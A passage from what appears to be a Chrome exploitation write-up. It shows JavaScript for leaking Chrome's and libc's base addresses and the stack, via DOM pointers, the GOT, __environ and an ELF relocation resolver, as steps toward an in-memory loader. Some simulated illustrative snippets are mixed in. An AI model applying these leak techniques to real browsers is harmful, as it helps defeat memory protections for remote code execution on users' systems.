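// Stand-in for the heap region that starts at root_isolate (the real one is far larger).
const fake_heap = new ArrayBuffer(0x1000);
const fake_heap_accesor = new DataView(fake_heap);

// Tagged compressed pointers carry a set low bit; clearing it gives the byte offset
// from the heap base, which is exactly what the DataView expects.
function heap_read32(tagged_ptr) {
  return fake_heap_accesor.getUint32(tagged_ptr - 1, true);
}

function heap_write32(tagged_ptr, value) {
  fake_heap_accesor.setUint32(tagged_ptr - 1, value, true);
}

// Plant a fake object at offset 0x100 and reach it through its tagged pointer 0x101.
const tagged_ptr = 0x101;
heap_write32(tagged_ptr, 0x41414141);     // first field
heap_write32(tagged_ptr + 4, 0x42424242); // second field

console.log(heap_read32(tagged_ptr).toString(16));     // 41414141
console.log(heap_read32(tagged_ptr + 4).toString(16)); // 42424242
```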

Obtaining relevant leaks ─────────────────────────────────────────────────────────────//──

Now that we can read and write arbitrary memory in a stable manner, we have to locate

the specific memory regions that we will need to access in order to craft

our SHELF loader.

The following diagram illustrates the pointer relationships of the different memory

regions we are interested in:

:: Leaking Chrome Base ::

Leaking Chrome's base is relatively simple and can be illustrated with the following code

snippet:

function get_image_base(ptr) {

    let dword = 0;

    let centinel = ptr;

    while (dword !== 0x464c457f) {

        centinel -= 0x1000n;

        dword = arb_read(itof(centinel), 4);

    }

    return centinel;

}

let div = window.document.createElement('div');

let div_addr = stable_addrof(div);

let _HTMLDivElement = itof(ftoi(div_addr) + 0xCn);

let HTMLDivElement_addr = weak_read(_HTMLDivElement);

let ptr = itof((ftoi(HTMLDivElement_addr) - kBaseSearchSpaceOffset) & ~(0xfffn));

let chrome_base = get_image_base(ftoi(ptr));

In order to leak the base address of Chrome, we start by creating an arbitrary DOM

element. Usually, DOM elements have references within their object layout to some part

of Blink's code base. As an example, we can create a div element to leak one of these

pointers and then subtract the appropriate offset from it to retrieve Chrome's base, or

scan backward in search of the ELF header magic.
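
The backward scan can be tried against simulated memory. In this sketch the mapping base,

the position of the fake ELF header and the read32 helper are assumptions made for

illustration, and unlike get_image_base above it checks the starting page first and gives

up after a bounded number of pages:

```javascript
const PAGE_SIZE = 0x1000n;
const ELF_MAGIC = 0x464c457f; // "\x7fELF" read as a little-endian dword

// Simulated address space: 16 pages mapped at a made-up base address.
const MAP_BASE = 0x555555550000n;
const memory = new DataView(new ArrayBuffer(0x10000));
const IMAGE_BASE = MAP_BASE + 0x3000n;
memory.setUint32(0x3000, ELF_MAGIC, true); // fake ELF header on page 3

// Stand-in for an arbitrary read primitive; unmapped addresses read as 0 here.
function read32(addr) {
  const offset = addr - MAP_BASE;
  if (offset < 0n || offset + 4n > BigInt(memory.byteLength)) return 0;
  return memory.getUint32(Number(offset), true);
}

// Walk backward one page at a time until the ELF magic shows up.
function find_image_base(ptr, max_pages = 0x100000) {
  let cursor = ptr & ~(PAGE_SIZE - 1n); // round down to a page boundary
  for (let i = 0; i < max_pages; i++) {
    if (read32(cursor) === ELF_MAGIC) return cursor;
    cursor -= PAGE_SIZE;
  }
  return null; // give up instead of looping forever
}

const leaked_ptr = MAP_BASE + 0x9abcn; // pretend pointer into the image
console.log("0x" + find_image_base(leaked_ptr).toString(16)); // 0x555555553000
```

In a real process an unmapped page would fault rather than read as zero, so the scan

relies on the pages between the leaked pointer and the image base being mapped.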

:: Leaking Libc base ::

Once we have successfully retrieved the base of Chrome, we can retrieve a pointer to

libc from Chrome's Global Offset Table (GOT), as this should be a fixed offset per

Chrome patch level. After that, we can apply the same methodology as for retrieving

the base address of Chrome, by scanning backward for an ELF header magic:

let libc_leak = chrome_accesor.getFloat64(kGOTOffset, true);

libc_leak = itof(ftoi(libc_leak) & ~(0xfffn));

let libc_base = get_image_base(ftoi(libc_leak));

:: Leaking the process stack ::

Now that we have libc's base address, we can retrieve the symbol __environ from libc, as

it points to the process' environment variables held on the stack. Since for this post

we are writing an exploit that already depends on the Chrome version, we want to be able to

resolve the address of this symbol independently of the libc version. To do this, we can

build a resolver in JavaScript leveraging our stable read primitive.

let elf = new Elf(libc_base, libc_accesor);

let environ_addr = elf.resolve_reloc("__environ", R_X86_64_GLOB_DAT);

let stack_leak = libc_accesor.getBigUint64(Number(environ_addr-libc_base), true)

To do so, we first have to retrieve the address of libc's DYNAMIC segment and resolve

several of its dynamic entries: DT_RELA, which holds the address of the relocation table

we need to scan; DT_STRTAB, which gives access to .dynstr; and DT_SYMTAB, which gives

access to the symbol entries in .dynsym.
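
As a sketch of what walking these entries looks like, the snippet below parses a synthetic

dynamic section held in an ArrayBuffer. The tag values and the Elf64_Dyn layout come from

the ELF specification; build_dynamic, parse_dynamic, decode_r_info and the sample

addresses are made up for illustration:

```javascript
// Dynamic tags from the ELF specification.
const DT_NULL = 0n, DT_STRTAB = 5n, DT_SYMTAB = 6n;
const DT_RELA = 7n, DT_RELASZ = 8n, DT_RELAENT = 9n;
const SIZEOF_ELF64_DYN = 16; // d_tag (8 bytes) + d_un (8 bytes)

// Serialize [tag, value] pairs into a synthetic dynamic section.
function build_dynamic(entries) {
  const view = new DataView(new ArrayBuffer(entries.length * SIZEOF_ELF64_DYN));
  entries.forEach(([tag, value], i) => {
    view.setBigUint64(i * SIZEOF_ELF64_DYN, tag, true);
    view.setBigUint64(i * SIZEOF_ELF64_DYN + 8, value, true);
  });
  return view;
}

// Collect the entries a resolver needs, stopping at the DT_NULL terminator.
function parse_dynamic(view) {
  const info = {};
  for (let off = 0; off + SIZEOF_ELF64_DYN <= view.byteLength; off += SIZEOF_ELF64_DYN) {
    const d_tag = view.getBigUint64(off, true);
    const d_val = view.getBigUint64(off + 8, true);
    if (d_tag === DT_NULL) break;
    switch (d_tag) {
      case DT_STRTAB: info.strtab = d_val; break;
      case DT_SYMTAB: info.symtab = d_val; break;
      case DT_RELA: info.rela = d_val; break;
      case DT_RELASZ: info.relasz = d_val; break;
      case DT_RELAENT: info.relaent = d_val; break;
      default: break;
    }
  }
  return info;
}

// Split Elf64_Rela.r_info into symbol index (high dword) and type (low dword).
function decode_r_info(r_info) {
  return { r_sym: r_info >> 32n, r_type: r_info & 0xffffffffn };
}

const dyn = parse_dynamic(build_dynamic([
  [DT_STRTAB, 0x1000n], [DT_SYMTAB, 0x2000n], [DT_RELA, 0x3000n],
  [DT_RELASZ, 0x30n], [DT_RELAENT, 0x18n], [DT_NULL, 0n],
]));
const reloc = decode_r_info(0x0000002a00000006n);

console.log(dyn.relasz / dyn.relaent);   // 2n relocation entries
console.log(reloc.r_sym, reloc.r_type);  // 42n 6n
```

Reading the low and high dwords of r_info separately, as a little-endian resolver can do

with two 4-byte reads, yields the same two fields.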

We can then iterate the relocation table to search for the symbol we want. A snippet of

the relevant code of this ELF resolver to retrieve relocation entries is shown below:

let phnum = this.read(this.base_addr + offsetof_phnum, 2);

let phoff = this.read(this.base_addr + offsetof_phoff, 8);

for (let i = 0n; i < phnum; i++) {

    let offset = phoff + sizeof_Elf64_Phdr * i;

    let p_type = this.read(this.base_addr + offset + offsetof_p_type, 4);

    if (p_type == PT_DYNAMIC) {

        dyn_phdr = i;

    }

}

let dyn_phdr_filesz = this.read(this.base_addr + phoff + sizeof_Elf64_Phdr * dyn_phdr + offsetof_p_filesz, 8);

let dyn_phdr_vaddr = this.read(this.base_addr + phoff + sizeof_Elf64_Phdr * dyn_phdr + offsetof_p_vaddr, 8);

for (let i = 0n; i < dyn_phdr_filesz/sizeof_Elf64_Dyn; i++) {

    let dyn_offset = dyn_phdr_vaddr + sizeof_Elf64_Dyn * i;

    let d_tag = this.read(this.base_addr + dyn_offset + offsetof_d_tag, 8);

    let d_val = this.read(this.base_addr + dyn_offset + offsetof_d_un_d_val, 8);

    switch (d_tag) {

        case DT_PLTGOT:

            this.pltgot = d_val;

            break;

        case DT_JMPREL:

            this.jmprel = d_val;

            break;

        case DT_PLTRELSZ:

            this.pltrelsz = d_val;

            break;

        case DT_SYMTAB:

            this.symtab = d_val;

            break;

        case DT_STRTAB:

            this.strtab = d_val;

            break;

        case DT_STRSZ:

            this.strsz = d_val;

            break;

        case DT_RELAENT:

            this.relaent = d_val;

            break;

        case DT_RELA:

            this.rel = d_val;

            break;

        case DT_RELASZ:

            this.relasz = d_val;

            break;

        default:

            break;

    }

}

let centinel, size;

if (sym_type == R_X86_64_GLOB_DAT) {

    centinel = this.rel;

    size = this.relasz/this.relaent;

} else {

    centinel = this.jmprel;

    size = this.pltrelsz/this.relaent;

}

for (let i = 0n; i < size; i++) {

let rela_offset = centinel + (sizeof_Elf64_Rela * i);

let r_type = this.read(rela_offset + offsetof_r_info + 0n, 4);

let r_sym = this.read(rela_offset + offsetof_r_info + 4n, 4);

let sym_address;

if (r_type == sym_type) {

let sym_offset = this.symtab + BigInt(r_sym) * sizeof_Elf64_Sym;

if (sym_offset == 0n) {

continue;

}

let st_name = this.read(sym_offset + offsetof_st_name, 4);

if (st_name == 0n) {

continue;

}

if (sym_type == R_X86_64_GLOB_DAT) {

sym_address = this.base_addr + BigInt(this.read(sym_offset + offsetof_st_value, 4));

} else {

sym_address = this.pltgot + (i + 3n) * 8n;

}